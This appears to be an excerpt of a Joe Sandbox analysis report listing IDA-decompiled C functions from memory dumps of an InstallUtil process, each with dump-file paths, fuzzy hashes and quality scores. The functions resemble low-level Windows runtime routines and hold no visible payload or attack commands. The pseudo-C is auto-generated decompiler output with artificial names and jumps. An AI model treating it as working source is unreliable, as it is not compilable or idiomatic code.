                      						_t81 = _t80 + 0x90;
                      						E012DFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                      						_t63 = 0;
                      						_push(0);
                      						_push(_t83);
                      						_t48 = E0130B180();
                      						if(_a4 != 0) {
                      							E012E2280(_t48, _t81);
                      						}
                      					} else {
                      						_t69 = _v8;
                      						_t12 = _t80 + 0x98; // 0x98
                      						_t13 = _t69 + 0xc; // 0x575651ff
                      						E012EBB2D(_t13, _t12);
                      						_t71 = _v8;
                      						_t15 = _t80 + 0xb0; // 0xb0
                      						_t16 = _t71 + 8; // 0x8b000cc2
                      						E012EBB2D(_t16, _t15);
                      						E012EB944(_v8, _t62);
                      						 *((char*)(_t80 + 0xdc)) = 0;
                      						E012DFFB0(0, _t80, _t82);
                      						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                      						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                      						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                      						 *(_t80 + 0xde) = 0;
                      						if(_a4 == 0) {
                      							_t25 = _t80 + 0x90; // 0x90
                      							E012DFFB0(0, _t80, _t25);
                      						}
                      						_t63 = 1;
                      					}
                      					return _t63;
                      				}
                      				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                      				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                      				if(_a4 == 0) {
                      					_t24 = _t80 + 0x90; // 0x90
                      					E012DFFB0(0, __ecx, _t24);
                      				}
                      				return 0;
                      			}

















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                      • Instruction ID: 17cff37357c040ef35e67f55b78a60fbd50b67489c4c2dfee1c96af4f130f07b
                      • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                      • Instruction Fuzzy Hash: 08316672A1054BAFDB04EBF8C494BF9FBD4BF52204F48415AC41C4B241DB74AA1ACBE1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 76%
                      			E01347016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                      				signed int _v8;
                      				char _v588;
                      				intOrPtr _v592;
                      				intOrPtr _v596;
                      				signed short* _v600;
                      				char _v604;
                      				short _v606;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed short* _t55;
                      				void* _t56;
                      				signed short* _t58;
                      				signed char* _t61;
                      				char* _t68;
                      				void* _t69;
                      				void* _t71;
                      				void* _t72;
                      				signed int _t75;
                      
                      				_t64 = __edx;
                      				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                      				_v8 =  *0x13bd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                      				_t55 = _a16;
                      				_v606 = __ecx;
                      				_t71 = 0;
                      				_t58 = _a12;
                      				_v596 = __edx;
                      				_v600 = _t58;
                      				_t68 =  &_v588;
                      				if(_t58 != 0) {
                      					_t71 = ( *_t58 & 0x0000ffff) + 2;
                      					if(_t55 != 0) {
                      						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                      					}
                      				}
                      				_t8 = _t71 + 0x2a; // 0x28
                      				_t33 = _t8;
                      				_v592 = _t8;
                      				if(_t71 <= 0x214) {
                      					L6:
                      					 *((short*)(_t68 + 6)) = _v606;
                      					if(_t64 != 0xffffffff) {
                      						asm("cdq");
                      						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                      						 *((char*)(_t68 + 0x28)) = _a4;
                      						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                      						 *((char*)(_t68 + 0x29)) = _a8;
                      						if(_t71 != 0) {
                      							_t22 = _t68 + 0x2a; // 0x2a
                      							_t64 = _t22;
                      							E01346B4C(_t58, _t22, _t71,  &_v604);
                      							if(_t55 != 0) {
                      								_t25 = _v604 + 0x2a; // 0x2a
                      								_t64 = _t25 + _t68;
                      								E01346B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                      							}
                      							if(E012E7D50() == 0) {
                      								_t61 = 0x7ffe0384;
                      							} else {
                      								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                      							}
                      							_push(_t68);
                      							_push(_v592 + 0xffffffe0);
                      							_push(0x402);
                      							_push( *_t61 & 0x000000ff);
                      							E01309AE0();
                      						}
                      					}
                      					_t35 =  &_v588;
                      					if( &_v588 != _t68) {
                      						_t35 = L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                      					}
                      					L16:
                      					_pop(_t69);
                      					_pop(_t72);
                      					_pop(_t56);
                      					return E0130B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                      				}
                      				_t68 = L012E4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                      				if(_t68 == 0) {
                      					goto L16;
                      				} else {
                      					_t58 = _v600;
                      					_t64 = _v596;
                      					goto L6;
                      				}
                      			}























                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b5f1c295d04ab80f1e515c5cd1de01a56ba79cc8494700cee16ef98f46cf28f6
                      • Instruction ID: 005157862298e604af2ca457fea9e9e9f25be558f99894d90d544c146939d80a
                      • Opcode Fuzzy Hash: b5f1c295d04ab80f1e515c5cd1de01a56ba79cc8494700cee16ef98f46cf28f6
                      • Instruction Fuzzy Hash: F831C0726047919FD321DF2CC840A6AB7E9FF88704F044A29F99987690E730E904CBA6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E012FA70E(intOrPtr* __ecx, char* __edx) {
                      				unsigned int _v8;
                      				intOrPtr* _v12;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* _t16;
                      				intOrPtr _t17;
                      				intOrPtr _t28;
                      				char* _t33;
                      				intOrPtr _t37;
                      				intOrPtr _t38;
                      				void* _t50;
                      				intOrPtr _t52;
                      
                      				_push(__ecx);
                      				_push(__ecx);
                      				_t52 =  *0x13b7b10; // 0x0
                      				_t33 = __edx;
                      				_t48 = __ecx;
                      				_v12 = __ecx;
                      				if(_t52 == 0) {
                      					 *0x13b7b10 = 8;
                      					 *0x13b7b14 = 0x13b7b0c;
                      					 *0x13b7b18 = 1;
                      					L6:
                      					_t2 = _t52 + 1; // 0x1
                      					E012FA990(0x13b7b10, _t2, 7);
                      					asm("bts ecx, eax");
                      					 *_t48 = _t52;
                      					 *_t33 = 1;
                      					L3:
                      					_t16 = 0;
                      					L4:
                      					return _t16;
                      				}
                      				_t17 = L012FA840(__edx, __ecx, __ecx, _t52, 0x13b7b10, 1, 0);
                      				if(_t17 == 0xffffffff) {
                      					_t37 =  *0x13b7b10; // 0x0
                      					_t3 = _t37 + 0x27; // 0x27
                      					__eflags = _t3 >> 5 -  *0x13b7b18; // 0x0
                      					if(__eflags > 0) {
                      						_t38 =  *0x13b7b9c; // 0x0
                      						_t4 = _t52 + 0x27; // 0x27
                      						_v8 = _t4 >> 5;
                      						_t50 = L012E4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                      						__eflags = _t50;
                      						if(_t50 == 0) {
                      							_t16 = 0xc0000017;
                      							goto L4;
                      						}
                      						 *0x13b7b18 = _v8;
                      						_t8 = _t52 + 7; // 0x7
                      						E0130F3E0(_t50,  *0x13b7b14, _t8 >> 3);
                      						_t28 =  *0x13b7b14; // 0x0
                      						__eflags = _t28 - 0x13b7b0c;
                      						if(_t28 != 0x13b7b0c) {
                      							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                      						}
                      						_t9 = _t52 + 8; // 0x8
                      						 *0x13b7b14 = _t50;
                      						_t48 = _v12;
                      						 *0x13b7b10 = _t9;
                      						goto L6;
                      					}
                      					 *0x13b7b10 = _t37 + 8;
                      					goto L6;
                      				}
                      				 *__ecx = _t17;
                      				 *_t33 = 0;
                      				goto L3;
                      			}

















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 185c22beeedb0facda93715bf5f107375235268a1be44de4854395b009bb6f6b
                      • Instruction ID: 5ac14528d3a2d5e99111e0f53fd3bba6ddeab9082fcc155a7b239009ab306f09
                      • Opcode Fuzzy Hash: 185c22beeedb0facda93715bf5f107375235268a1be44de4854395b009bb6f6b
                      • Instruction Fuzzy Hash: D2319EB1720201DBD729CB18D8C1F69BBF9FBC4714F14096AE70A97A84E7B0A901CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E012F61A0(signed int* __ecx) {
                      				intOrPtr _v8;
                      				char _v12;
                      				intOrPtr* _v16;
                      				intOrPtr _v20;
                      				intOrPtr _t30;
                      				intOrPtr _t31;
                      				void* _t32;
                      				intOrPtr _t33;
                      				intOrPtr _t37;
                      				intOrPtr _t49;
                      				signed int _t51;
                      				intOrPtr _t52;
                      				signed int _t54;
                      				void* _t59;
                      				signed int* _t61;
                      				intOrPtr* _t64;
                      
                      				_t61 = __ecx;
                      				_v12 = 0;
                      				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                      				_v16 = __ecx;
                      				_v8 = 0;
                      				if(_t30 == 0) {
                      					L6:
                      					_t31 = 0;
                      					L7:
                      					return _t31;
                      				}
                      				_t32 = _t30 + 0x5d8;
                      				if(_t32 == 0) {
                      					goto L6;
                      				}
                      				_t59 = _t32 + 0x30;
                      				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                      					goto L6;
                      				}
                      				if(__ecx != 0) {
                      					 *((intOrPtr*)(__ecx)) = 0;
                      					 *((intOrPtr*)(__ecx + 4)) = 0;
                      				}
                      				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                      					_t51 =  *(_t32 + 0x10);
                      					_t33 = _t32 + 0x10;
                      					_v20 = _t33;
                      					_t54 =  *(_t33 + 4);
                      					if((_t51 | _t54) == 0) {
                      						_t37 = E012F5E50(0x12a67cc, 0, 0,  &_v12);
                      						if(_t37 != 0) {
                      							goto L6;
                      						}
                      						_t52 = _v8;
                      						asm("lock cmpxchg8b [esi]");
                      						_t64 = _v16;
                      						_t49 = _t37;
                      						_v20 = 0;
                      						if(_t37 == 0) {
                      							if(_t64 != 0) {
                      								 *_t64 = _v12;
                      								 *((intOrPtr*)(_t64 + 4)) = _t52;
                      							}
                      							E01399D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                      							_t31 = 1;
                      							goto L7;
                      						}
                      						E012CF7C0(_t52, _v12, _t52, 0);
                      						if(_t64 != 0) {
                      							 *_t64 = _t49;
                      							 *((intOrPtr*)(_t64 + 4)) = _v20;
                      						}
                      						L12:
                      						_t31 = 1;
                      						goto L7;
                      					}
                      					if(_t61 != 0) {
                      						 *_t61 = _t51;
                      						_t61[1] = _t54;
                      					}
                      					goto L12;
                      				} else {
                      					goto L6;
                      				}
                      			}




















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6b3b4b3af005e5b24dcd90bc08be9b183e6e26573da83d301ebdf88a38cde7c
                      • Instruction ID: 30c66751fa9705a1f7dd8757e8745f2a158c76b8045893818e9de632c9089dae
                      • Opcode Fuzzy Hash: e6b3b4b3af005e5b24dcd90bc08be9b183e6e26573da83d301ebdf88a38cde7c
                      • Instruction Fuzzy Hash: 9D317AB16157028FE360CF1DC950B2AFBE5FB88B14F05496DEA989B351E7B0E804CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E012CAA16(signed short* __ecx) {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				signed short _v16;
                      				intOrPtr _v20;
                      				signed short _v24;
                      				signed short _v28;
                      				void* _v32;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr _t25;
                      				signed short _t38;
                      				signed short* _t42;
                      				signed int _t44;
                      				signed short* _t52;
                      				signed short _t53;
                      				signed int _t54;
                      
                      				_v8 =  *0x13bd360 ^ _t54;
                      				_t42 = __ecx;
                      				_t44 =  *__ecx & 0x0000ffff;
                      				_t52 =  &(__ecx[2]);
                      				_t51 = _t44 + 2;
                      				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                      					L4:
                      					_t25 =  *0x13b7b9c; // 0x0
                      					_t53 = L012E4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                      					__eflags = _t53;
                      					if(_t53 == 0) {
                      						L3:
                      						return E0130B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                      					} else {
                      						E0130F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                      						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                      						L2:
                      						_t51 = 4;
                      						if(L012D6C59(_t53, _t51, _t58) != 0) {
                      							_t28 = E012F5E50(0x12ac338, 0, 0,  &_v32);
                      							__eflags = _t28;
                      							if(_t28 == 0) {
                      								_t38 = ( *_t42 & 0x0000ffff) + 2;
                      								__eflags = _t38;
                      								_v24 = _t53;
                      								_v16 = _t38;
                      								_v20 = 0;
                      								_v12 = 0;
                      								E012FB230(_v32, _v28, 0x12ac2d8, 1,  &_v24);
                      								_t28 = E012CF7A0(_v32, _v28);
                      							}
                      							__eflags = _t53 -  *_t52;
                      							if(_t53 !=  *_t52) {
                      								_t28 = L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                      							}
                      						}
                      						goto L3;
                      					}
                      				}
                      				_t53 =  *_t52;
                      				_t44 = _t44 >> 1;
                      				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                      				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                      					goto L4;
                      				}
                      				goto L2;
                      			}





















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 677017ab87cd44250d058bd201156834107a47260bdf255699756533fd183f0e
                      • Instruction ID: 4166f75dfd9796f9ade1cffc29c4e7a10fd6787615c8410428b81488cc17811f
                      • Opcode Fuzzy Hash: 677017ab87cd44250d058bd201156834107a47260bdf255699756533fd183f0e
                      • Instruction Fuzzy Hash: 6731C371A1022AABCF15AF68CD81A7FB7B9EF54B00F41446DFA05E7240E7749911CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E01308EC7(void* __ecx, void* __edx) {
                      				signed int _v8;
                      				signed int* _v16;
                      				intOrPtr _v20;
                      				signed int* _v24;
                      				char* _v28;
                      				signed int* _v32;
                      				intOrPtr _v36;
                      				signed int* _v40;
                      				signed int* _v44;
                      				signed int* _v48;
                      				intOrPtr _v52;
                      				signed int* _v56;
                      				signed int* _v60;
                      				signed int* _v64;
                      				intOrPtr _v68;
                      				signed int* _v72;
                      				char* _v76;
                      				signed int* _v80;
                      				signed int _v84;
                      				signed int* _v88;
                      				intOrPtr _v92;
                      				signed int* _v96;
                      				intOrPtr _v100;
                      				signed int* _v104;
                      				signed int* _v108;
                      				char _v140;
                      				signed int _v144;
                      				signed int _v148;
                      				signed int* _v152;
                      				char _v156;
                      				signed int* _v160;
                      				char _v164;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* _t67;
                      				intOrPtr _t70;
                      				void* _t71;
                      				void* _t72;
                      				signed int _t73;
                      
                      				_t69 = __edx;
                      				_v8 =  *0x13bd360 ^ _t73;
                      				_t48 =  *[fs:0x30];
                      				_t72 = __edx;
                      				_t71 = __ecx;
                      				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                      					_t48 = E012F4E70(0x13b86e4, 0x1309490, 0, 0);
                      					if( *0x13b53e8 > 5 && E01308F33(0x13b53e8, 0, 0x2000) != 0) {
                      						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                      						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                      						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                      						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                      						_v108 =  &_v84;
                      						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                      						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                      						_v76 =  &_v156;
                      						_t70 = 8;
                      						_v60 =  &_v144;
                      						_t67 = 4;
                      						_v44 =  &_v148;
                      						_v152 = 0;
                      						_v160 = 0;
                      						_v104 = 0;
                      						_v100 = 2;
                      						_v96 = 0;
                      						_v88 = 0;
                      						_v80 = 0;
                      						_v72 = 0;
                      						_v68 = _t70;
                      						_v64 = 0;
                      						_v56 = 0;
                      						_v52 = 0x13b53e8;
                      						_v48 = 0;
                      						_v40 = 0;
                      						_v36 = 0x13b53e8;
                      						_v32 = 0;
                      						_v28 =  &_v164;
                      						_v24 = 0;
                      						_v20 = _t70;
                      						_v16 = 0;
                      						_t69 = 0x12abc46;
                      						_t48 = E01347B9C(0x13b53e8, 0x12abc46, _t67, 0x13b53e8, _t70,  &_v140);
                      					}
                      				}
                      				return E0130B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                      			}












































                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f27171ece84c6c5b55c8ced11205acc5d5df8c59f21f0c023c7cb846ab47b01a
                      • Instruction ID: 98fa7d8c9ae257a18150fd165ed6ef5971da706ad023bcc7f33c673f92897da0
                      • Opcode Fuzzy Hash: f27171ece84c6c5b55c8ced11205acc5d5df8c59f21f0c023c7cb846ab47b01a
                      • Instruction Fuzzy Hash: CA4181B1D0121C9FDB20CFAAD981AADFBF8FB48714F5041AEE609A7640E7705A85CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 74%
                      			E012FE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                      				intOrPtr* _v0;
                      				signed char _v4;
                      				signed int _v8;
                      				void* __ecx;
                      				void* __ebp;
                      				void* _t37;
                      				intOrPtr _t38;
                      				signed int _t44;
                      				signed char _t52;
                      				void* _t54;
                      				intOrPtr* _t56;
                      				void* _t58;
                      				char* _t59;
                      				signed int _t62;
                      
                      				_t58 = __edx;
                      				_push(0);
                      				_push(4);
                      				_push( &_v8);
                      				_push(0x24);
                      				_push(0xffffffff);
                      				if(E01309670() < 0) {
                      					E0131DF30(_t54, _t58, _t35);
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					_push(_t54);
                      					_t52 = _v4;
                      					if(_t52 > 8) {
                      						_t37 = 0xc0000078;
                      					} else {
                      						_t38 =  *0x13b7b9c; // 0x0
                      						_t62 = _t52 & 0x000000ff;
                      						_t59 = L012E4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                      						if(_t59 == 0) {
                      							_t37 = 0xc0000017;
                      						} else {
                      							_t56 = _v0;
                      							 *(_t59 + 1) = _t52;
                      							 *_t59 = 1;
                      							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                      							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                      							_t44 = _t62 - 1;
                      							if(_t44 <= 7) {
                      								switch( *((intOrPtr*)(_t44 * 4 +  &M012FE810))) {
                      									case 0:
                      										L6:
                      										 *((intOrPtr*)(_t59 + 8)) = _a8;
                      										goto L7;
                      									case 1:
                      										L13:
                      										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                      										goto L6;
                      									case 2:
                      										L12:
                      										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                      										goto L13;
                      									case 3:
                      										L11:
                      										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                      										goto L12;
                      									case 4:
                      										L10:
                      										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                      										goto L11;
                      									case 5:
                      										L9:
                      										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                      										goto L10;
                      									case 6:
                      										L17:
                      										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                      										goto L9;
                      									case 7:
                      										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                      										goto L17;
                      								}
                      							}
                      							L7:
                      							 *_a40 = _t59;
                      							_t37 = 0;
                      						}
                      					}
                      					return _t37;
                      				} else {
                      					_push(0x20);
                      					asm("ror eax, cl");
                      					return _a4 ^ _v8;
                      				}
                      			}


















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b74871e28662b0c2b7149a27c3c0478510aa12c1334b1f29200e7ab6c12240d7
                      • Instruction ID: eee69e128774ba7bb3889808cbb6a29cce35f48e4b01ed6d4995f05054218a4a
                      • Opcode Fuzzy Hash: b74871e28662b0c2b7149a27c3c0478510aa12c1334b1f29200e7ab6c12240d7
                      • Instruction Fuzzy Hash: 23318F75A24249EFD705DF58D841B9AFBE4FB09314F15826AFA08CB391D671ED80CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 67%
                      			E012FBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				void* __ebx;
                      				void* __edi;
                      				intOrPtr _t22;
                      				intOrPtr* _t41;
                      				intOrPtr _t51;
                      
                      				_t51 =  *0x13b6100; // 0x5
                      				_v12 = __edx;
                      				_v8 = __ecx;
                      				if(_t51 >= 0x800) {
                      					L12:
                      					return 0;
                      				} else {
                      					goto L1;
                      				}
                      				while(1) {
                      					L1:
                      					_t22 = _t51;
                      					asm("lock cmpxchg [ecx], edx");
                      					if(_t51 == _t22) {
                      						break;
                      					}
                      					_t51 = _t22;
                      					if(_t22 < 0x800) {
                      						continue;
                      					}
                      					goto L12;
                      				}
                      				E012E2280(0xd, 0x628f1a0);
                      				_t41 =  *0x13b60f8; // 0x0
                      				if(_t41 != 0) {
                      					 *0x13b60f8 =  *_t41;
                      					 *0x13b60fc =  *0x13b60fc + 0xffff;
                      				}
                      				E012DFFB0(_t41, 0x800, 0x628f1a0);
                      				if(_t41 != 0) {
                      					L6:
                      					asm("movsd");
                      					asm("movsd");
                      					asm("movsd");
                      					asm("movsd");
                      					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                      					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                      					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                      					do {
                      						asm("lock xadd [0x13b60f0], ax");
                      						 *((short*)(_t41 + 0x34)) = 1;
                      					} while (1 == 0);
                      					goto L8;
                      				} else {
                      					_t41 = L012E4620(0x13b6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                      					if(_t41 == 0) {
                      						L11:
                      						asm("lock dec dword [0x13b6100]");
                      						L8:
                      						return _t41;
                      					}
                      					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                      					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                      					if(_t41 == 0) {
                      						goto L11;
                      					}
                      					goto L6;
                      				}
                      			}











                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e70b98d4840487c8aac01063d806914d26e9d33cc603278f19ba30146180a0bc
                      • Instruction ID: 375bee2bb7d15fd7ed9909a365e707d01164089df1028dd81375cd5bf3103806
                      • Opcode Fuzzy Hash: e70b98d4840487c8aac01063d806914d26e9d33cc603278f19ba30146180a0bc
                      • Instruction Fuzzy Hash: ED3120B6A206069FCB21DF58C4C27A6B3B8FF18310F040078EF49DB246EB74D9058B81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 76%
                      			E012C9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                      				signed int _t53;
                      				signed int _t56;
                      				signed int* _t60;
                      				signed int _t63;
                      				signed int _t66;
                      				signed int _t69;
                      				void* _t70;
                      				intOrPtr* _t72;
                      				void* _t78;
                      				void* _t79;
                      				signed int _t80;
                      				intOrPtr _t82;
                      				void* _t85;
                      				void* _t88;
                      				void* _t89;
                      
                      				_t84 = __esi;
                      				_t70 = __ecx;
                      				_t68 = __ebx;
                      				_push(0x2c);
                      				_push(0x139f6e8);
                      				E0131D0E8(__ebx, __edi, __esi);
                      				 *((char*)(_t85 - 0x1d)) = 0;
                      				_t82 =  *((intOrPtr*)(_t85 + 8));
                      				if(_t82 == 0) {
                      					L4:
                      					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                      						E013988F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                      					}
                      					L5:
                      					return E0131D130(_t68, _t82, _t84);
                      				}
                      				_t88 = _t82 -  *0x13b86c0; // 0xe607b0
                      				if(_t88 == 0) {
                      					goto L4;
                      				}
                      				_t89 = _t82 -  *0x13b86b8; // 0x0
                      				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                      					goto L4;
                      				} else {
                      					E012E2280(_t82 + 0xe0, _t82 + 0xe0);
                      					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                      					__eflags =  *((char*)(_t82 + 0xe5));
                      					if(__eflags != 0) {
                      						E013988F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                      						goto L12;
                      					} else {
                      						__eflags =  *((char*)(_t82 + 0xe4));
                      						if( *((char*)(_t82 + 0xe4)) == 0) {
                      							 *((char*)(_t82 + 0xe4)) = 1;
                      							_push(_t82);
                      							_push( *((intOrPtr*)(_t82 + 0x24)));
                      							E0130AFD0();
                      						}
                      						while(1) {
                      							_t60 = _t82 + 8;
                      							 *(_t85 - 0x2c) = _t60;
